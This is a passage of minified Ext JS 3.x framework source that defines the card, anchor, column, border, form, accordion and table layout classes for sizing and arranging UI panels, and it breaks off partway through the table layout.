Ext.Container.LAYOUTS.fit = Ext.layout.FitLayout;
Ext.layout.CardLayout = Ext.extend(Ext.layout.FitLayout, {deferredRender:false, layoutOnCardChange:false, renderHidden:true, type:"card", setActiveItem:function (d) {
var a = this.activeItem, b = this.container;
d = b.getComponent(d);
if (d && a != d) {
if (a) {
a.hide();
if (a.hidden !== true) {
return false
}
a.fireEvent("deactivate", a)
}
var c = d.doLayout && (this.layoutOnCardChange || !d.rendered);
this.activeItem = d;
delete d.deferLayout;
d.show();
this.layout();
if (c) {
d.doLayout()
}
d.fireEvent("activate", d)
}
}, renderAll:function (a, b) {
if (this.deferredRender) {
this.renderItem(this.activeItem, undefined, b)
} else {
Ext.layout.CardLayout.superclass.renderAll.call(this, a, b)
}
}});
Ext.Container.LAYOUTS.card = Ext.layout.CardLayout;
Ext.layout.AnchorLayout = Ext.extend(Ext.layout.ContainerLayout, {monitorResize:true, type:"anchor", defaultAnchor:"100%", parseAnchorRE:/^(r|right|b|bottom)$/i, getLayoutTargetSize:function () {
var b = this.container.getLayoutTarget(), a = {};
if (b) {
a = b.getViewSize();
if (Ext.isIE && Ext.isStrict && a.width == 0) {
a = b.getStyleSize()
}
a.width -= b.getPadding("lr");
a.height -= b.getPadding("tb")
}
return a
}, onLayout:function (m, w) {
Ext.layout.AnchorLayout.superclass.onLayout.call(this, m, w);
var p = this.getLayoutTargetSize(), k = p.width, o = p.height, q = w.getStyle("overflow"), n = this.getRenderedItems(m), t = n.length, g = [], j, a, v, l, h, c, e, d, u = 0, s, b;
if (k < 20 && o < 20) {
return
}
if (m.anchorSize) {
if (typeof m.anchorSize == "number") {
a = m.anchorSize
} else {
a = m.anchorSize.width;
v = m.anchorSize.height
}
} else {
a = m.initialConfig.width;
v = m.initialConfig.height
}
for (s = 0; s < t; s++) {
l = n[s];
b = l.getPositionEl();
if (!l.anchor && l.items && !Ext.isNumber(l.width) && !(Ext.isIE6 && Ext.isStrict)) {
l.anchor = this.defaultAnchor
}
if (l.anchor) {
h = l.anchorSpec;
if (!h) {
d = l.anchor.split(" ");
l.anchorSpec = h = {right:this.parseAnchor(d[0], l.initialConfig.width, a), bottom:this.parseAnchor(d[1], l.initialConfig.height, v)}
}
c = h.right ? this.adjustWidthAnchor(h.right(k) - b.getMargins("lr"), l) : undefined;
e = h.bottom ? this.adjustHeightAnchor(h.bottom(o) - b.getMargins("tb"), l) : undefined;
if (c || e) {
g.push({component:l, width:c || undefined, height:e || undefined})
}
}
}
for (s = 0, t = g.length; s < t; s++) {
j = g[s];
j.component.setSize(j.width, j.height)
}
if (q && q != "hidden" && !this.adjustmentPass) {
var r = this.getLayoutTargetSize();
if (r.width != p.width || r.height != p.height) {
this.adjustmentPass = true;
this.onLayout(m, w)
}
}
delete this.adjustmentPass
}, parseAnchor:function (c, h, b) {
if (c && c != "none") {
var e;
if (this.parseAnchorRE.test(c)) {
var g = b - h;
return function (a) {
if (a !== e) {
e = a;
return a - g
}
}
} else {
if (c.indexOf("%") != -1) {
var d = parseFloat(c.replace("%", "")) * 0.01;
return function (a) {
if (a !== e) {
e = a;
return Math.floor(a * d)
}
}
} else {
c = parseInt(c, 10);
if (!isNaN(c)) {
return function (a) {
if (a !== e) {
e = a;
return a + c
}
}
}
}
}
}
return false
}, adjustWidthAnchor:function (b, a) {
return b
}, adjustHeightAnchor:function (b, a) {
return b
}});
Ext.Container.LAYOUTS.anchor = Ext.layout.AnchorLayout;
Ext.layout.ColumnLayout = Ext.extend(Ext.layout.ContainerLayout, {monitorResize:true, type:"column", extraCls:"x-column", scrollOffset:0, targetCls:"x-column-layout-ct", isValidParent:function (b, a) {
return this.innerCt && b.getPositionEl().dom.parentNode == this.innerCt.dom
}, getLayoutTargetSize:function () {
var b = this.container.getLayoutTarget(), a;
if (b) {
a = b.getViewSize();
if (Ext.isIE && Ext.isStrict && a.width == 0) {
a = b.getStyleSize()
}
a.width -= b.getPadding("lr");
a.height -= b.getPadding("tb")
}
return a
}, renderAll:function (a, b) {
if (!this.innerCt) {
this.innerCt = b.createChild({cls:"x-column-inner"});
this.innerCt.createChild({cls:"x-clear"})
}
Ext.layout.ColumnLayout.superclass.renderAll.call(this, a, this.innerCt)
}, onLayout:function (e, k) {
var g = e.items.items, j = g.length, n, b, a, o = [];
this.renderAll(e, k);
var r = this.getLayoutTargetSize();
if (r.width < 1 && r.height < 1) {
return
}
var p = r.width - this.scrollOffset, d = r.height, q = p;
this.innerCt.setWidth(p);
for (b = 0; b < j; b++) {
n = g[b];
a = n.getPositionEl().getMargins("lr");
o[b] = a;
if (!n.columnWidth) {
q -= (n.getWidth() + a)
}
}
q = q < 0 ? 0 : q;
for (b = 0; b < j; b++) {
n = g[b];
a = o[b];
if (n.columnWidth) {
n.setSize(Math.floor(n.columnWidth * q) - a)
}
}
if (Ext.isIE) {
if (b = k.getStyle("overflow") && b != "hidden" && !this.adjustmentPass) {
var l = this.getLayoutTargetSize();
if (l.width != r.width) {
this.adjustmentPass = true;
this.onLayout(e, k)
}
}
}
delete this.adjustmentPass
}});
Ext.Container.LAYOUTS.column = Ext.layout.ColumnLayout;
Ext.layout.BorderLayout = Ext.extend(Ext.layout.ContainerLayout, {monitorResize:true, rendered:false, type:"border", targetCls:"x-border-layout-ct", getLayoutTargetSize:function () {
var a = this.container.getLayoutTarget();
return a ? a.getViewSize() : {}
}, onLayout:function (g, I) {
var j, B, F, o, x = g.items.items, C = x.length;
if (!this.rendered) {
j = [];
for (B = 0; B < C; B++) {
F = x[B];
o = F.region;
if (F.collapsed) {
j.push(F)
}
F.collapsed = false;
if (!F.rendered) {
F.render(I, B);
F.getPositionEl().addClass("x-border-panel")
}
this[o] = o != "center" && F.split ? new Ext.layout.BorderLayout.SplitRegion(this, F.initialConfig, o) : new Ext.layout.BorderLayout.Region(this, F.initialConfig, o);
this[o].render(I, F)
}
this.rendered = true
}
var v = this.getLayoutTargetSize();
if (v.width < 20 || v.height < 20) {
if (j) {
this.restoreCollapsed = j
}
return
} else {
if (this.restoreCollapsed) {
j = this.restoreCollapsed;
delete this.restoreCollapsed
}
}
var t = v.width, D = v.height, r = t, A = D, p = 0, q = 0, y = this.north, u = this.south, l = this.west, E = this.east, F = this.center, H, z, d, G;
if (!F && Ext.layout.BorderLayout.WARN !== false) {
throw"No center region defined in BorderLayout " + g.id
}
if (y && y.isVisible()) {
H = y.getSize();
z = y.getMargins();
H.width = t - (z.left + z.right);
H.x = z.left;
H.y = z.top;
p = H.height + H.y + z.bottom;
A -= p;
y.applyLayout(H)
}
if (u && u.isVisible()) {
H = u.getSize();
z = u.getMargins();
H.width = t - (z.left + z.right);
H.x = z.left;
G = (H.height + z.top + z.bottom);
H.y = D - G + z.top;
A -= G;
u.applyLayout(H)
}
if (l && l.isVisible()) {
H = l.getSize();
z = l.getMargins();
H.height = A - (z.top + z.bottom);
H.x = z.left;
H.y = p + z.top;
d = (H.width + z.left + z.right);
q += d;
r -= d;
l.applyLayout(H)
}
if (E && E.isVisible()) {
H = E.getSize();
z = E.getMargins();
H.height = A - (z.top + z.bottom);
d = (H.width + z.left + z.right);
H.x = t - d + z.left;
H.y = p + z.top;
r -= d;
E.applyLayout(H)
}
if (F) {
z = F.getMargins();
var k = {x:q + z.left, y:p + z.top, width:r - (z.left + z.right), height:A - (z.top + z.bottom)};
F.applyLayout(k)
}
if (j) {
for (B = 0, C = j.length; B < C; B++) {
j[B].collapse(false)
}
}
if (Ext.isIE && Ext.isStrict) {
I.repaint()
}
if (B = I.getStyle("overflow") && B != "hidden" && !this.adjustmentPass) {
var a = this.getLayoutTargetSize();
if (a.width != v.width || a.height != v.height) {
this.adjustmentPass = true;
this.onLayout(g, I)
}
}
delete this.adjustmentPass
}, destroy:function () {
var b = ["north", "south", "east", "west"], a, c;
for (a = 0; a < b.length; a++) {
c = this[b[a]];
if (c) {
if (c.destroy) {
c.destroy()
} else {
if (c.split) {
c.split.destroy(true)
}
}
}
}
Ext.layout.BorderLayout.superclass.destroy.call(this)
}});
Ext.layout.BorderLayout.Region = function (b, a, c) {
Ext.apply(this, a);
this.layout = b;
this.position = c;
this.state = {};
if (typeof this.margins == "string") {
this.margins = this.layout.parseMargins(this.margins)
}
this.margins = Ext.applyIf(this.margins || {}, this.defaultMargins);
if (this.collapsible) {
if (typeof this.cmargins == "string") {
this.cmargins = this.layout.parseMargins(this.cmargins)
}
if (this.collapseMode == "mini" && !this.cmargins) {
this.cmargins = {left:0, top:0, right:0, bottom:0}
} else {
this.cmargins = Ext.applyIf(this.cmargins || {}, c == "north" || c == "south" ? this.defaultNSCMargins : this.defaultEWCMargins)
}
}
};
Ext.layout.BorderLayout.Region.prototype = {collapsible:false, split:false, floatable:true, minWidth:50, minHeight:50, defaultMargins:{left:0, top:0, right:0, bottom:0}, defaultNSCMargins:{left:5, top:5, right:5, bottom:5}, defaultEWCMargins:{left:5, top:0, right:5, bottom:0}, floatingZIndex:100, isCollapsed:false, render:function (b, c) {
this.panel = c;
c.el.enableDisplayMode();
this.targetEl = b;
this.el = c.el;
var a = c.getState, d = this.position;
c.getState = function () {
return Ext.apply(a.call(c) || {}, this.state)
}.createDelegate(this);
if (d != "center") {
c.allowQueuedExpand = false;
c.on({beforecollapse:this.beforeCollapse, collapse:this.onCollapse, beforeexpand:this.beforeExpand, expand:this.onExpand, hide:this.onHide, show:this.onShow, scope:this});
if (this.collapsible || this.floatable) {
c.collapseEl = "el";
c.slideAnchor = this.getSlideAnchor()
}
if (c.tools && c.tools.toggle) {
c.tools.toggle.addClass("x-tool-collapse-" + d);
c.tools.toggle.addClassOnOver("x-tool-collapse-" + d + "-over")
}
}
}, getCollapsedEl:function () {
if (!this.collapsedEl) {
if (!this.toolTemplate) {
var b = new Ext.Template('<div class="x-tool x-tool-{id}"> </div>');
b.disableFormats = true;
b.compile();
Ext.layout.BorderLayout.Region.prototype.toolTemplate = b
}
this.collapsedEl = this.targetEl.createChild({cls:"x-layout-collapsed x-layout-collapsed-" + this.position, id:this.panel.id + "-xcollapsed"});
this.collapsedEl.enableDisplayMode("block");
if (this.collapseMode == "mini") {
this.collapsedEl.addClass("x-layout-cmini-" + this.position);
this.miniCollapsedEl = this.collapsedEl.createChild({cls:"x-layout-mini x-layout-mini-" + this.position, html:" "});
this.miniCollapsedEl.addClassOnOver("x-layout-mini-over");
this.collapsedEl.addClassOnOver("x-layout-collapsed-over");
this.collapsedEl.on("click", this.onExpandClick, this, {stopEvent:true})
} else {
if (this.collapsible !== false && !this.hideCollapseTool) {
var a = this.expandToolEl = this.toolTemplate.append(this.collapsedEl.dom, {id:"expand-" + this.position}, true);
a.addClassOnOver("x-tool-expand-" + this.position + "-over");
a.on("click", this.onExpandClick, this, {stopEvent:true})
}
if (this.floatable !== false || this.titleCollapse) {
this.collapsedEl.addClassOnOver("x-layout-collapsed-over");
this.collapsedEl.on("click", this[this.floatable ? "collapseClick" : "onExpandClick"], this)
}
}
}
return this.collapsedEl
}, onExpandClick:function (a) {
if (this.isSlid) {
this.panel.expand(false)
} else {
this.panel.expand()
}
}, onCollapseClick:function (a) {
this.panel.collapse()
}, beforeCollapse:function (c, a) {
this.lastAnim = a;
if (this.splitEl) {
this.splitEl.hide()
}
this.getCollapsedEl().show();
var b = this.panel.getEl();
this.originalZIndex = b.getStyle("z-index");
b.setStyle("z-index", 100);
this.isCollapsed = true;
this.layout.layout()
}, onCollapse:function (a) {
this.panel.el.setStyle("z-index", 1);
if (this.lastAnim === false || this.panel.animCollapse === false) {
this.getCollapsedEl().dom.style.visibility = "visible"
} else {
this.getCollapsedEl().slideIn(this.panel.slideAnchor, {duration:0.2})
}
this.state.collapsed = true;
this.panel.saveState()
}, beforeExpand:function (a) {
if (this.isSlid) {
this.afterSlideIn()
}
var b = this.getCollapsedEl();
this.el.show();
if (this.position == "east" || this.position == "west") {
this.panel.setSize(undefined, b.getHeight())
} else {
this.panel.setSize(b.getWidth(), undefined)
}
b.hide();
b.dom.style.visibility = "hidden";
this.panel.el.setStyle("z-index", this.floatingZIndex)
}, onExpand:function () {
this.isCollapsed = false;
if (this.splitEl) {
this.splitEl.show()
}
this.layout.layout();
this.panel.el.setStyle("z-index", this.originalZIndex);
this.state.collapsed = false;
this.panel.saveState()
}, collapseClick:function (a) {
if (this.isSlid) {
a.stopPropagation();
this.slideIn()
} else {
a.stopPropagation();
this.slideOut()
}
}, onHide:function () {
if (this.isCollapsed) {
this.getCollapsedEl().hide()
} else {
if (this.splitEl) {
this.splitEl.hide()
}
}
}, onShow:function () {
if (this.isCollapsed) {
this.getCollapsedEl().show()
} else {
if (this.splitEl) {
this.splitEl.show()
}
}
}, isVisible:function () {
return !this.panel.hidden
}, getMargins:function () {
return this.isCollapsed && this.cmargins ? this.cmargins : this.margins
}, getSize:function () {
return this.isCollapsed ? this.getCollapsedEl().getSize() : this.panel.getSize()
}, setPanel:function (a) {
this.panel = a
}, getMinWidth:function () {
return this.minWidth
}, getMinHeight:function () {
return this.minHeight
}, applyLayoutCollapsed:function (a) {
var b = this.getCollapsedEl();
b.setLeftTop(a.x, a.y);
b.setSize(a.width, a.height)
}, applyLayout:function (a) {
if (this.isCollapsed) {
this.applyLayoutCollapsed(a)
} else {
this.panel.setPosition(a.x, a.y);
this.panel.setSize(a.width, a.height)
}
}, beforeSlide:function () {
this.panel.beforeEffect()
}, afterSlide:function () {
this.panel.afterEffect()
}, initAutoHide:function () {
if (this.autoHide !== false) {
if (!this.autoHideHd) {
this.autoHideSlideTask = new Ext.util.DelayedTask(this.slideIn, this);
this.autoHideHd = {mouseout:function (a) {
if (!a.within(this.el, true)) {
this.autoHideSlideTask.delay(500)
}
}, mouseover:function (a) {
this.autoHideSlideTask.cancel()
}, scope:this}
}
this.el.on(this.autoHideHd);
this.collapsedEl.on(this.autoHideHd)
}
}, clearAutoHide:function () {
if (this.autoHide !== false) {
this.el.un("mouseout", this.autoHideHd.mouseout);
this.el.un("mouseover", this.autoHideHd.mouseover);
this.collapsedEl.un("mouseout", this.autoHideHd.mouseout);
this.collapsedEl.un("mouseover", this.autoHideHd.mouseover)
}
}, clearMonitor:function () {
Ext.getDoc().un("click", this.slideInIf, this)
}, slideOut:function () {
if (this.isSlid || this.el.hasActiveFx()) {
return
}
this.isSlid = true;
var b = this.panel.tools, c, a;
if (b && b.toggle) {
b.toggle.hide()
}
this.el.show();
a = this.panel.collapsed;
this.panel.collapsed = false;
if (this.position == "east" || this.position == "west") {
c = this.panel.deferHeight;
this.panel.deferHeight = false;
this.panel.setSize(undefined, this.collapsedEl.getHeight());
this.panel.deferHeight = c
} else {
this.panel.setSize(this.collapsedEl.getWidth(), undefined)
}
this.panel.collapsed = a;
this.restoreLT = [this.el.dom.style.left, this.el.dom.style.top];
this.el.alignTo(this.collapsedEl, this.getCollapseAnchor());
this.el.setStyle("z-index", this.floatingZIndex + 2);
this.panel.el.replaceClass("x-panel-collapsed", "x-panel-floating");
if (this.animFloat !== false) {
this.beforeSlide();
this.el.slideIn(this.getSlideAnchor(), {callback:function () {
this.afterSlide();
this.initAutoHide();
Ext.getDoc().on("click", this.slideInIf, this)
}, scope:this, block:true})
} else {
this.initAutoHide();
Ext.getDoc().on("click", this.slideInIf, this)
}
}, afterSlideIn:function () {
this.clearAutoHide();
this.isSlid = false;
this.clearMonitor();
this.el.setStyle("z-index", "");
this.panel.el.replaceClass("x-panel-floating", "x-panel-collapsed");
this.el.dom.style.left = this.restoreLT[0];
this.el.dom.style.top = this.restoreLT[1];
var a = this.panel.tools;
if (a && a.toggle) {
a.toggle.show()
}
}, slideIn:function (a) {
if (!this.isSlid || this.el.hasActiveFx()) {
Ext.callback(a);
return
}
this.isSlid = false;
if (this.animFloat !== false) {
this.beforeSlide();
this.el.slideOut(this.getSlideAnchor(), {callback:function () {
this.el.hide();
this.afterSlide();
this.afterSlideIn();
Ext.callback(a)
}, scope:this, block:true})
} else {
this.el.hide();
this.afterSlideIn()
}
}, slideInIf:function (a) {
if (!a.within(this.el)) {
this.slideIn()
}
}, anchors:{west:"left", east:"right", north:"top", south:"bottom"}, sanchors:{west:"l", east:"r", north:"t", south:"b"}, canchors:{west:"tl-tr", east:"tr-tl", north:"tl-bl", south:"bl-tl"}, getAnchor:function () {
return this.anchors[this.position]
}, getCollapseAnchor:function () {
return this.canchors[this.position]
}, getSlideAnchor:function () {
return this.sanchors[this.position]
}, getAlignAdj:function () {
var a = this.cmargins;
switch (this.position) {
case"west":
return[0, 0];
break;
case"east":
return[0, 0];
break;
case"north":
return[0, 0];
break;
case"south":
return[0, 0];
break
}
}, getExpandAdj:function () {
var b = this.collapsedEl, a = this.cmargins;
switch (this.position) {
case"west":
return[-(a.right + b.getWidth() + a.left), 0];
break;
case"east":
return[a.right + b.getWidth() + a.left, 0];
break;
case"north":
return[0, -(a.top + a.bottom + b.getHeight())];
break;
case"south":
return[0, a.top + a.bottom + b.getHeight()];
break
}
}, destroy:function () {
if (this.autoHideSlideTask && this.autoHideSlideTask.cancel) {
this.autoHideSlideTask.cancel()
}
Ext.destroyMembers(this, "miniCollapsedEl", "collapsedEl", "expandToolEl")
}};
Ext.layout.BorderLayout.SplitRegion = function (b, a, c) {
Ext.layout.BorderLayout.SplitRegion.superclass.constructor.call(this, b, a, c);
this.applyLayout = this.applyFns[c]
};
Ext.extend(Ext.layout.BorderLayout.SplitRegion, Ext.layout.BorderLayout.Region, {splitTip:"Drag to resize.", collapsibleSplitTip:"Drag to resize. Double click to hide.", useSplitTips:false, splitSettings:{north:{orientation:Ext.SplitBar.VERTICAL, placement:Ext.SplitBar.TOP, maxFn:"getVMaxSize", minProp:"minHeight", maxProp:"maxHeight"}, south:{orientation:Ext.SplitBar.VERTICAL, placement:Ext.SplitBar.BOTTOM, maxFn:"getVMaxSize", minProp:"minHeight", maxProp:"maxHeight"}, east:{orientation:Ext.SplitBar.HORIZONTAL, placement:Ext.SplitBar.RIGHT, maxFn:"getHMaxSize", minProp:"minWidth", maxProp:"maxWidth"}, west:{orientation:Ext.SplitBar.HORIZONTAL, placement:Ext.SplitBar.LEFT, maxFn:"getHMaxSize", minProp:"minWidth", maxProp:"maxWidth"}}, applyFns:{west:function (c) {
if (this.isCollapsed) {
return this.applyLayoutCollapsed(c)
}
var d = this.splitEl.dom, b = d.style;
this.panel.setPosition(c.x, c.y);
var a = d.offsetWidth;
b.left = (c.x + c.width - a) + "px";
b.top = (c.y) + "px";
b.height = Math.max(0, c.height) + "px";
this.panel.setSize(c.width - a, c.height)
}, east:function (c) {
if (this.isCollapsed) {
return this.applyLayoutCollapsed(c)
}
var d = this.splitEl.dom, b = d.style;
var a = d.offsetWidth;
this.panel.setPosition(c.x + a, c.y);
b.left = (c.x) + "px";
b.top = (c.y) + "px";
b.height = Math.max(0, c.height) + "px";
this.panel.setSize(c.width - a, c.height)
}, north:function (c) {
if (this.isCollapsed) {
return this.applyLayoutCollapsed(c)
}
var d = this.splitEl.dom, b = d.style;
var a = d.offsetHeight;
this.panel.setPosition(c.x, c.y);
b.left = (c.x) + "px";
b.top = (c.y + c.height - a) + "px";
b.width = Math.max(0, c.width) + "px";
this.panel.setSize(c.width, c.height - a)
}, south:function (c) {
if (this.isCollapsed) {
return this.applyLayoutCollapsed(c)
}
var d = this.splitEl.dom, b = d.style;
var a = d.offsetHeight;
this.panel.setPosition(c.x, c.y + a);
b.left = (c.x) + "px";
b.top = (c.y) + "px";
b.width = Math.max(0, c.width) + "px";
this.panel.setSize(c.width, c.height - a)
}}, render:function (a, c) {
Ext.layout.BorderLayout.SplitRegion.superclass.render.call(this, a, c);
var d = this.position;
this.splitEl = a.createChild({cls:"x-layout-split x-layout-split-" + d, html:" ", id:this.panel.id + "-xsplit"});
if (this.collapseMode == "mini") {
this.miniSplitEl = this.splitEl.createChild({cls:"x-layout-mini x-layout-mini-" + d, html:" "});
this.miniSplitEl.addClassOnOver("x-layout-mini-over");
this.miniSplitEl.on("click", this.onCollapseClick, this, {stopEvent:true})
}
var b = this.splitSettings[d];
this.split = new Ext.SplitBar(this.splitEl.dom, c.el, b.orientation);
this.split.tickSize = this.tickSize;
this.split.placement = b.placement;
this.split.getMaximumSize = this[b.maxFn].createDelegate(this);
this.split.minSize = this.minSize || this[b.minProp];
this.split.on("beforeapply", this.onSplitMove, this);
this.split.useShim = this.useShim === true;
this.maxSize = this.maxSize || this[b.maxProp];
if (c.hidden) {
this.splitEl.hide()
}
if (this.useSplitTips) {
this.splitEl.dom.title = this.collapsible ? this.collapsibleSplitTip : this.splitTip
}
if (this.collapsible) {
this.splitEl.on("dblclick", this.onCollapseClick, this)
}
}, getSize:function () {
if (this.isCollapsed) {
return this.collapsedEl.getSize()
}
var a = this.panel.getSize();
if (this.position == "north" || this.position == "south") {
a.height += this.splitEl.dom.offsetHeight
} else {
a.width += this.splitEl.dom.offsetWidth
}
return a
}, getHMaxSize:function () {
var b = this.maxSize || 10000;
var a = this.layout.center;
return Math.min(b, (this.el.getWidth() + a.el.getWidth()) - a.getMinWidth())
}, getVMaxSize:function () {
var b = this.maxSize || 10000;
var a = this.layout.center;
return Math.min(b, (this.el.getHeight() + a.el.getHeight()) - a.getMinHeight())
}, onSplitMove:function (b, a) {
var c = this.panel.getSize();
this.lastSplitSize = a;
if (this.position == "north" || this.position == "south") {
this.panel.setSize(c.width, a);
this.state.height = a
} else {
this.panel.setSize(a, c.height);
this.state.width = a
}
this.layout.layout();
this.panel.saveState();
return false
}, getSplitBar:function () {
return this.split
}, destroy:function () {
Ext.destroy(this.miniSplitEl, this.split, this.splitEl);
Ext.layout.BorderLayout.SplitRegion.superclass.destroy.call(this)
}});
Ext.Container.LAYOUTS.border = Ext.layout.BorderLayout;
Ext.layout.FormLayout = Ext.extend(Ext.layout.AnchorLayout, {labelSeparator:":", trackLabels:true, type:"form", onRemove:function (d) {
Ext.layout.FormLayout.superclass.onRemove.call(this, d);
if (this.trackLabels) {
d.un("show", this.onFieldShow, this);
d.un("hide", this.onFieldHide, this)
}
var b = d.getPositionEl(), a = d.getItemCt && d.getItemCt();
if (d.rendered && a) {
if (b && b.dom) {
b.insertAfter(a)
}
Ext.destroy(a);
Ext.destroyMembers(d, "label", "itemCt");
if (d.customItemCt) {
Ext.destroyMembers(d, "getItemCt", "customItemCt")
}
}
}, setContainer:function (a) {
Ext.layout.FormLayout.superclass.setContainer.call(this, a);
if (a.labelAlign) {
a.addClass("x-form-label-" + a.labelAlign)
}
if (a.hideLabels) {
Ext.apply(this, {labelStyle:"display:none", elementStyle:"padding-left:0;", labelAdjust:0})
} else {
this.labelSeparator = Ext.isDefined(a.labelSeparator) ? a.labelSeparator : this.labelSeparator;
a.labelWidth = a.labelWidth || 100;
if (Ext.isNumber(a.labelWidth)) {
var b = Ext.isNumber(a.labelPad) ? a.labelPad : 5;
Ext.apply(this, {labelAdjust:a.labelWidth + b, labelStyle:"width:" + a.labelWidth + "px;", elementStyle:"padding-left:" + (a.labelWidth + b) + "px"})
}
if (a.labelAlign == "top") {
Ext.apply(this, {labelStyle:"width:auto;", labelAdjust:0, elementStyle:"padding-left:0;"})
}
}
}, isHide:function (a) {
return a.hideLabel || this.container.hideLabels
}, onFieldShow:function (a) {
a.getItemCt().removeClass("x-hide-" + a.hideMode);
if (a.isComposite) {
a.doLayout()
}
}, onFieldHide:function (a) {
a.getItemCt().addClass("x-hide-" + a.hideMode)
}, getLabelStyle:function (e) {
var b = "", c = [this.labelStyle, e];
for (var d = 0, a = c.length; d < a; ++d) {
if (c[d]) {
b += c[d];
if (b.substr(-1, 1) != ";") {
b += ";"
}
}
}
return b
}, renderItem:function (e, a, d) {
if (e && (e.isFormField || e.fieldLabel) && e.inputType != "hidden") {
var b = this.getTemplateArgs(e);
if (Ext.isNumber(a)) {
a = d.dom.childNodes[a] || null
}
if (a) {
e.itemCt = this.fieldTpl.insertBefore(a, b, true)
} else {
e.itemCt = this.fieldTpl.append(d, b, true)
}
if (!e.getItemCt) {
Ext.apply(e, {getItemCt:function () {
return e.itemCt
}, customItemCt:true})
}
e.label = e.getItemCt().child("label.x-form-item-label");
if (!e.rendered) {
e.render("x-form-el-" + e.id)
} else {
if (!this.isValidParent(e, d)) {
Ext.fly("x-form-el-" + e.id).appendChild(e.getPositionEl())
}
}
if (this.trackLabels) {
if (e.hidden) {
this.onFieldHide(e)
}
e.on({scope:this, show:this.onFieldShow, hide:this.onFieldHide})
}
this.configureItem(e)
} else {
Ext.layout.FormLayout.superclass.renderItem.apply(this, arguments)
}
}, getTemplateArgs:function (c) {
var a = !c.fieldLabel || c.hideLabel, b = (c.itemCls || this.container.itemCls || "") + (c.hideLabel ? " x-hide-label" : "");
if (Ext.isIE9 && Ext.isIEQuirks && c instanceof Ext.form.TextField) {
b += " x-input-wrapper"
}
return{id:c.id, label:c.fieldLabel, itemCls:b, clearCls:c.clearCls || "x-form-clear-left", labelStyle:this.getLabelStyle(c.labelStyle), elementStyle:this.elementStyle || "", labelSeparator:a ? "" : (Ext.isDefined(c.labelSeparator) ? c.labelSeparator : this.labelSeparator)}
}, adjustWidthAnchor:function (a, d) {
if (d.label && !this.isHide(d) && (this.container.labelAlign != "top")) {
var b = Ext.isIE6 || (Ext.isIE && !Ext.isStrict);
return a - this.labelAdjust + (b ? -3 : 0)
}
return a
}, adjustHeightAnchor:function (a, b) {
if (b.label && !this.isHide(b) && (this.container.labelAlign == "top")) {
return a - b.label.getHeight()
}
return a
}, isValidParent:function (b, a) {
return a && this.container.getEl().contains(b.getPositionEl())
}});
Ext.Container.LAYOUTS.form = Ext.layout.FormLayout;
Ext.layout.AccordionLayout = Ext.extend(Ext.layout.FitLayout, {fill:true, autoWidth:true, titleCollapse:true, hideCollapseTool:false, collapseFirst:false, animate:false, sequence:false, activeOnTop:false, type:"accordion", renderItem:function (a) {
if (this.animate === false) {
a.animCollapse = false
}
a.collapsible = true;
if (this.autoWidth) {
a.autoWidth = true
}
if (this.titleCollapse) {
a.titleCollapse = true
}
if (this.hideCollapseTool) {
a.hideCollapseTool = true
}
if (this.collapseFirst !== undefined) {
a.collapseFirst = this.collapseFirst
}
if (!this.activeItem && !a.collapsed) {
this.setActiveItem(a, true)
} else {
if (this.activeItem && this.activeItem != a) {
a.collapsed = true
}
}
Ext.layout.AccordionLayout.superclass.renderItem.apply(this, arguments);
a.header.addClass("x-accordion-hd");
a.on("beforeexpand", this.beforeExpand, this)
}, onRemove:function (a) {
Ext.layout.AccordionLayout.superclass.onRemove.call(this, a);
if (a.rendered) {
a.header.removeClass("x-accordion-hd")
}
a.un("beforeexpand", this.beforeExpand, this)
}, beforeExpand:function (c, b) {
var a = this.activeItem;
if (a) {
if (this.sequence) {
delete this.activeItem;
if (!a.collapsed) {
a.collapse({callback:function () {
c.expand(b || true)
}, scope:this});
return false
}
} else {
a.collapse(this.animate)
}
}
this.setActive(c);
if (this.activeOnTop) {
c.el.dom.parentNode.insertBefore(c.el.dom, c.el.dom.parentNode.firstChild)
}
this.layout()
}, setItemSize:function (g, e) {
if (this.fill && g) {
var d = 0, c, b = this.getRenderedItems(this.container), a = b.length, h;
for (c = 0; c < a; c++) {
if ((h = b[c]) != g && !h.hidden) {
d += h.header.getHeight()
}
}
e.height -= d;
g.setSize(e)
}
}, setActiveItem:function (a) {
this.setActive(a, true)
}, setActive:function (c, b) {
var a = this.activeItem;
c = this.container.getComponent(c);
if (a != c) {
if (c.rendered && c.collapsed && b) {
c.expand()
} else {
if (a) {
a.fireEvent("deactivate", a)
}
this.activeItem = c;
c.fireEvent("activate", c)
}
}
}});
Ext.Container.LAYOUTS.accordion = Ext.layout.AccordionLayout;
Ext.layout.Accordion = Ext.layout.AccordionLayout;
Ext.layout.TableLayout = Ext.extend(Ext.layout.ContainerLayout, {monitorResize:false, type:"table", targetCls:"x-table-layout-ct", tableAttrs:null, setContainer:function (a) {
Ext.layout.TableLayout.superclass.setContainer.call(this, a);
this.currentRow = 0;
this.currentColumn = 0;
this.cells = []
}, onLayout:function (d, g) {
var e = d.items.items, a = e.length, h, b;
if (!this.table) {
g.addClass("x-table-layout-ct");
this.table = g.createChild(Ext.apply({tag:"table", cls:"x-table-layout", cellspacing:0, cn:{tag:"tbody"}}, this.tableAttrs), null, true)
}
this.renderAll(d, g)
}, getRow:function (a) {
var b = this.table.tBodies[0].childNodes[a];
if (!b) {
b = document.createElement("tr");
this.table.tBodies[0].appendChild(b)
}
return b
}, getNextCell:function (j) {
var a = this.getNextNonSpan(this.currentColumn, this.currentRow);
var g = this.currentColumn = a[0], e = this.currentRow = a[1];
for (var i = e; i < e + (j.rowspan || 1); i++) {
if (!this.cells[i]) {
this.cells[i] = []
}
for (var d = g; d < g + (j.colspan || 1); d++) {
this.cells[i][d] = true
}
}
var h = document.createElement("td");
if (j.cellId) {
h.id = j.cellId
}
var b = "x-table-layout-cell";
if (j.cellCls) {
b += " " + j.cellCls
}
h.className = b;
if (j.colspan) {
h.colSpan = j.colspan
}
if (j.rowspan) {
h.rowSpan = j.rowspan
}
this.getRow(e).appendChild(h);
return h
}, getNextNonSpan:function (a, c) {
var b = this.columns;
while ((b && a >= b) || (this.cells[c] && this.cells[c][a])) {
if (b && a >= b) {
c++;
a = 0
} else {
a++
}
}
return[a, c]
}, renderItem:function (e, a, d) {
if (!this.table) {
this.table = d.createChild(Ext.apply({tag:"table", cls:"x-table-layout", cellspacing:0, cn:{tag:"tbody"}}, this.tableAttrs), null, true)
}
if (e && !e.rendered) {
e.render(this.getNextCell(e));
this.configureItem(e)
} else {
if (e && !this.isValidParent(e, d)) {
var b = this.getNextCell(e);
b.insertBefore(e.getPositionEl().dom, null);
e.container = Ext.get(b);
this.configureItem(e)
}
}
}, isValidParent:function (b, a) {
